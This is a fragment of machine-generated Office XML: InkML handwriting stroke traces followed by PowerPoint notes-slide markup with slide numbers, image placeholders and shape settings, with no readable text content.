  <inkml:trace contextRef="#ctx0" brushRef="#br0">5154 5399 24575,'3'-65'0,"1"0"0,-1 8 0,1 4 0,4-24 0,-4 36 0,-4-2 0,0-4 0,0 7 0,0-19 0,-6 14 0,4 15 0,-13-39 0,6 23 0,-8-28 0,6 17 0,-2-1 0,-14-29 0,-2-3 0,-4-4 0,6 30 0,-1-1-561,2 4 0,-1-5 0,2 6 561,2 4 0,-3-1 0,-15-23 0,-7-10 0,3 9 0,7 18 0,-1 1 0,-7-10 0,-6-8 0,5 9 0,6 13 0,0 5 0,-15-14 0,1 2 0,18 18 0,-2-2 0,-17-16 0,-7-8 0,5 6 0,10 12 0,0 1 0,1 1 0,-4-4 0,2 3 0,-8-8 0,3 5 0,7 9 0,1 1 0,1-2 0,2 1 0,3 4 0,3 4 0,-10-9 0,14 4 0,-13-10 0,16 19 0,-6-1 0,-1 1 0,-3-1 0,-26-21 0,45 42 0,-31-26 0,22 24 0,-18-14 1683,9-1-1683,-23-6 0,10-8 0,-25 3 0,29-1 0,0 12 0,1 2 0,3-5 0,-4 0 0,1 2 0,17 14 0,-16-9 0,-1-2 0,3 8 0,-31-21 0,49 32 0,-6-8 0,6 8 0,-7-4 0,7 6 0,1 4 0,8-1 0,-9-2 0,-13-4 0,13 0 0,-17 0 0,-22-14 0,22 12 0,-12-5 0,-1-4 0,-3-10 0,-14-3 0,29 7 0,5 6 0,18 13 0,-18-7 0,20 5 0,-20-3 0,17 2 0,-18 1 0,21 4 0,-21-1 0,19 1 0,-18-2 0,19 6 0,-16-7 0,16 6 0,-9-7 0,4-2 0,6 5 0,-1-1 0,-9 0 0,13 5 0,-28-12 0,23 8 0,-11-3 0,14 0 0,-3 3 0,2-2 0,2 3 0,0 0 0,4 0 0,-12 0 0,-6-4 0,-3 1 0,3-1 0,0 2 0,5 1 0,-20-10 0,-13-2 0,7 0 0,-11-6 0,15 6 0,-2-14 0,3 12 0,-1-10 0,24 27 0,-8-9 0,18 11 0,1 0 0,0-2 0,4 6 0,4 4 0,2 3 0,3 7 0,0-1 0,0 8 0,0 0 0,0 11 0,0-5 0,0 0 0,0-2 0,0 1 0,4 15 0,-2-3 0,6 4 0,-7-10 0,7 3 0,-7-9 0,10 22 0,-9-30 0,10 12 0,-11-17 0,2-3 0,-3 3 0,0-2 0,4 2 0,-3-3 0,3 0 0,0-1 0,-29-38 0,13 10 0,-16-19 0,18 24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1:35:09.591"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 151 24575,'9'-5'0,"-4"-3"0,2 7 0,-2-3 0,4 4 0,10-4 0,-4 2 0,9-3 0,-10 5 0,9-5 0,-8 4 0,17-9 0,8-1 0,-10 4 0,16-8 0,-20 9 0,0 0 0,-5-3 0,6 8 0,-14-3 0,11 4 0,-12 0 0,-2 0 0,2 0 0,-3 0 0,-1 0 0,9 0 0,-3 0 0,7-4 0,-3 3 0,21-8 0,-20 4 0,16-1 0,-26 2 0,3 4 0,-2 0 0,6 0 0,-6 0 0,2 0 0,-3 0 0,-1 0 0,1 0 0,-4-3 0,2 2 0,-10-7 0,6 7 0,-7-3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08:30.046"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFFFFF"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">4204 1 24575,'-73'43'0,"25"-20"0,4 0 0,-2-1 0,-13 1 0,23-5 0,-27 21 0,25-18 0,-1 9 0,-5-5 0,19-8 0,-38 23 0,36-21 0,-53 40 0,37-33 0,2 4 0,-4 1-522,-30 5 522,-8 16 0,6-16 0,2 5 0,9 0 0,16-16 0,-14 14 0,3-15 0,-4 0-3306,4-2 1,-6-2 3305,4-8 0,0-1 0,6 2 0,0 0 0,-13 2 0,-8-1 0,-8-3 0,-8 0 0,5 0 0,1 2 0,-2 0-575,-6-2 1,-7-1 0,12-3 574,23-6 0,7-2-1824,3 1 1,-6 0 1823,-19 3 0,-11 2 0,7-2 0,11-2 0,1 1 1122,1 4 0,-5 1 0,13-2-1122,-8-3-78,-17 5 78,34-7 1671,-11 0-1671,36 0 6407,-23 0-6407,14 5 996,-21-4-996,35 4 141,-9-1-141,20-3 0,-8 3 0,15-4 0,-8 0 0,7 3 0,-3-6 0,9 2 0,8-3 0,-3-4 0,7 7 0,-8-7 0,4-1 0,0-4 0,-3-1 0,7-6 0,-7 9 0,6-5 0,-6 7 0,3 0 0,-4 0 0,4 5 0,-3-4 0,6 3 0,-2-4 0,4 0 0,-1-3 0,13-6 0,-10 4 0,9-3 0,-11 12 0,-4-2 0,-2 9 0,-3-1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08:30.937"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFFFFF"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 18 24575,'5'-8'0,"2"3"0,-2 1 0,8 8 0,7 6 0,6 7 0,7 5 0,-5 5 0,21 10 0,-10 4 0,1 0 0,2 0 0,4 2 0,12 27 0,-37-49 0,-3 4 0,-8-16 0,2-1 0,-7-12 0,-1 3 0,-4-3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7:05.182"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">658 0 24575,'0'30'0,"-5"3"0,4-9 0,-4 1 0,5-2 0,0 0 0,0 1 0,-4 7 0,3 13 0,-4-10 0,0 9 0,4 0 0,-4-9 0,-1 21 0,-3 3 0,0 4 0,2 32 0,2-45 0,1 2-462,-2 11 1,1 3 461,-1 4 0,1 1 0,0 1 0,1-2 0,0-12 0,0 1 0,4 9 0,-2-1 0,-5-14 0,-2-1 0,4 11 0,0 0 0,-5 2 0,1-4 0,-2 19 0,2-15 0,0 0 0,-2 27 0,6-34 0,-1 1 0,-3 4 0,1-3 0,6 29 0,-6-33 0,-1-1 0,7 35 0,-6 8 0,-1 0 0,0-9 0,-9 9 0,9-12-277,-7 0 277,8-12 0,-9 9 0,9 3 0,-6-9 0,12 18 0,-13-9 0,8-21-361,-2-5 0,0-2 361,2-2 0,-8 39 0,13-48 0,-4-3 0,1-12 875,4-6-875,-4 5 280,5-16-280,-3 8 767,2-13-767,-3 6 0,4-6 0,0 3 0,0-4 0,0-7 0,4 2 0,-4-14 0,4 5 0,-4-6 0,-4 0 0,0 0 0,-4-5 0,-6-6 0,4 5 0,-10-12 0,10 6 0,-5-8 0,5 8 0,1 4 0,1 5 0,-1 5 0,5-5 0,-7 2 0,5-4 0,-2 1 0,1 3 0,2-2 0,1 5 0,-4-5 0,7 6 0,-6-7 0,3 7 0,-1-7 0,1 4 0,1-1 0,2 1 0,-3 0 0,4 3 0,-4 1 0,3 0 0,-2 7 0,3-2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08:35.101"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFFFFF"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'22'14'0,"-1"-2"0,-3-3 0,-5-1 0,23 11 0,-11-2 0,21 9 0,-20-6 0,13 9 0,-5 4 0,26 13 0,-24-11 0,19 16 0,0 0 0,-13-14 0,8 14 0,1-3 0,-4-19 0,10 16 0,-14-18 0,-3 4 0,-21-7 0,35 41 0,-12-16 0,17 24 0,-16-28 0,12 25 0,-20-33 0,19 41 0,-32-58 0,33 62 0,-17-49 0,17 48 0,-29-57 0,13 47 0,-22-46 0,17 33 0,-18-32 0,22 62 0,-15-29 0,8 25 0,-16-27 0,21 27 0,-22-36 0,5 2 0,0-2 0,-4-10 0,4 44 0,-3-28 0,-2 12 0,-13-33 0,9 15 0,-9-11 0,8 10 0,0-1 0,12 34 0,-11-30 0,10 25 0,-14-49 0,5 7 0,-5-6 0,-1-3 0,-1-7 0,-4-3 0,9 9 0,-4-8 0,5 24 0,-5-18 0,2 7 0,-1-4 0,3 21 0,-3-6 0,2 17 0,-6-30 0,7 64 0,-7-50 0,2 45 0,-4-54 0,0 18 0,0-11 0,0 11 0,0-25 0,0 23 0,0-23 0,0 43 0,0-45 0,0 64 0,0-49 0,0 27 0,0-21 0,0 19 0,-3-14 0,2 10 0,-3-35 0,0 15 0,-1-9 0,0 11 0,-3-26 0,2 31 0,-4-17 0,-1 27 0,0-22 0,1 9 0,0-18 0,6 8 0,0-19 0,-4 16 0,6-13 0,-10 8 0,11-15 0,-10 7 0,9-5 0,-10 9 0,7-11 0,-4 19 0,5-16 0,0 12 0,0-19 0,3 3 0,-7-3 0,7 3 0,-3 1 0,4-1 0,0 1 0,-4-4 0,3-17 0,-6 4 0,2-16 0,0 14 0,-3-2 0,7-1 0,-7-1 0,4 1 0,-5-4 0,4 8 0,-3-4 0,7 4 0,-3 1 0,4-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,-4 4 0,4-3 0,-4 0 0,4-2 0,0-3 0,-4 5 0,3-1 0,-3 0 0,0-3 0,3 2 0,-7 1 0,7 1 0,-3 7 0,4-2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22:08:36.207"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFFFFF"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 56 24575,'26'-5'0,"5"1"0,8-3 0,-10 5 0,28-5 0,-28 2 0,29 4 0,-21-9 0,1 5 0,-17-1 0,-13 2 0,-4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7:06.498"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 432 24575,'4'-8'0,"3"4"0,-6-4 0,10 0 0,-2-5 0,4-3 0,9-3 0,-1 0 0,16-12 0,1-2 0,12-5 0,-15 2 0,7 10 0,-20-4 0,1 10 0,-4-3 0,-7 6 0,4 4 0,-7 1 0,-1 4 0,-1 0 0,-2 0 0,-1-1 0,3 5 0,-6-3 0,3 2 0,-1 0 0,-2 2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9:24.249"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 1778 24575,'8'-5'0,"0"-2"0,4 2 0,13-19 0,6-4 0,24-19 0,-21 15 0,3-1 0,2-3 0,0-7 0,-2 0 0,29-25 0,-15 7 0,7-10 0,-9 8 0,6-14-661,4-3 0,-1-1 661,-9 7 0,-26 13 0,-1-2 0,1 19 0,-1-2 0,-2-23 0,-2 1 0,5-5-274,-9 16 0,-1 2 274,4-14 0,2-19 0,-7 45 0,-8-13 0,2 25 1285,1-14-1285,-6 30 585,2 6-585,-3 4 0,-3 2 0,2 14 0,-3-5 0,1 2 0,2-1 0,-3-3 0,4 4 0,0 1 0,0-1 0,-4-4 0,0 3 0,-1-2 0,-6 7 0,6-3 0,-11 2 0,7-2 0,-7-1 0,4 3 0,-1 2 0,-22 23 0,10-13 0,-8 13 0,10-17 0,7 8 0,-2-8 0,6 4 0,1-14 0,-5 9 0,5-11 0,-4 12 0,7-11 0,4 4 0,-1-7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09:25.384"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 2 24575,'8'-1'0,"4"2"0,-3 10 0,7-2 0,-4 7 0,7 3 0,-6-5 0,4 8 0,-2-2 0,-2-6 0,6 15 0,0-1 0,-3-2 0,9 12 0,-15-20 0,5 2 0,-7-9 0,0-6 0,-3-1 0,-2-4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1T17:13:15.822"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.6" units="cm"/>
      <inkml:brushProperty name="height" value="0.6" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 338 8027,'156'-7'0,"-20"0"0,-80 7 0,14 0 0,9 0 0,14 2 0,9 3 0,-3 1 0,-11 3 0,7-3 0,-7-6 0,5 0 0,0 0 0,4 0 0,1 0 0,-5 0 0,0 0 0,-8 0 0,-8 0 0,11 0 0,-9 0 0,-4 0 0,-6-1 0,-4-4 0,4 4 0,0-12 0,2 12 0,-7-6 0,-16 7 0,-14 0 0,-12-18 0,10 1 0,-15-5 0,10 10 0,-14 12 0,1 6 0,0 2 0,7-1 0,6 0 0,21-7 0,13 0 0,-7 0 0,12 0 0,-15 0 0,11 0 0,-6 0 0,0-7 0,0 0 0,6-1 0,1-4 0,13 8 0,3-5 0,-15 6 0,16-5 0,-15 4 0,-2-2 0,-12-4 0,2-2 0,8 3 0,-4-4 0,3-1 0,2-4 0,-2-1 0,1 1 0,-5 4 0,0 0 0,6 0 0,-5 0 0,-8 6 0,4 8 0,-35 8 0,1 0 0,-27-2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7250E-0EEC-3342-BAA1-2161A6B2A476}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>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9F8A5-8FD6-EA4C-8C10-4D7FB5642262}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="235246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3278C46-9D09-1048-8DC6-3E7DF50D5F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5E3EBA03-A53E-7F44-BCBB-030C79F3A3C1}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121859" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A410EA29-A78E-1642-8B1C-1AFFDDD0A2DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="401638" y="696913"/>
            <a:ext cx="6184900" cy="3479800"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121860" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBFAF1D0-0DD7-A24E-9411-22932D61F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11873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1CC038D9-9645-5047-9273-50AB78E10E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499EB57-D4C2-0344-A8FE-5FE862627F41}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125955" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45E8729E-FB4E-6744-8889-8CAD5CC037D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="696913"/>
            <a:ext cx="6188075" cy="3481387"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125956" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56A3EA5D-083A-3044-9E5B-148F6938ED7D}"/>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99178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9687DA-D75B-244A-8D41-606B62BF3F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755966D-2E4A-7446-80C0-A807293B60E3}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130051" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E7353A3-2A02-AA46-A46F-E7F974E43277}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="696913"/>
            <a:ext cx="6188075" cy="3481387"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130052" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97A08880-4819-BF4C-A20E-49DEB890F7E2}"/>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554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06A08864-D685-3A4F-8985-1B507BDCB0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D71899B7-8A82-4D4B-A591-A969ECB7F89D}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131075" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58AC80F0-78A3-F043-93DB-F850A202DAB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="696913"/>
            <a:ext cx="6188075" cy="3481387"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131076" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B1EDFC1-9603-8045-9EE4-3AFC7F989F72}"/>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65548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8C91DD1E-06B5-1549-BBFF-EFA8BC8309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8B09AEE-8C90-0748-A01A-4FD7C4E3B5ED}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132099" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DEA93AF-4639-3D47-B638-3248A81BD0A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="696913"/>
            <a:ext cx="6188075" cy="3481387"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132100" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B2C75B9-E886-3A42-AEF1-EAC39FA195FD}"/>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8949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CD8173F-1B0A-6842-8E73-29C90B7A0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2FA5AAFC-BD01-E249-8490-DDCB67FF3A6E}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133123" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{797DAF01-79B7-B445-BB60-B17B3910BBA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="696913"/>
            <a:ext cx="6188075" cy="3481387"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133124" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47D6D798-5613-7C48-BA95-92F954BD1C1B}"/>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4834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CD8173F-1B0A-6842-8E73-29C90B7A0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2FA5AAFC-BD01-E249-8490-DDCB67FF3A6E}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133123" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{797DAF01-79B7-B445-BB60-B17B3910BBA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="696913"/>
            <a:ext cx="6188075" cy="3481387"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133124" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47D6D798-5613-7C48-BA95-92F954BD1C1B}"/>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5793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ECD8173F-1B0A-6842-8E73-29C90B7A08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2FA5AAFC-BD01-E249-8490-DDCB67FF3A6E}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133123" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{797DAF01-79B7-B445-BB60-B17B3910BBA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="696913"/>
            <a:ext cx="6188075" cy="3481387"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133124" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
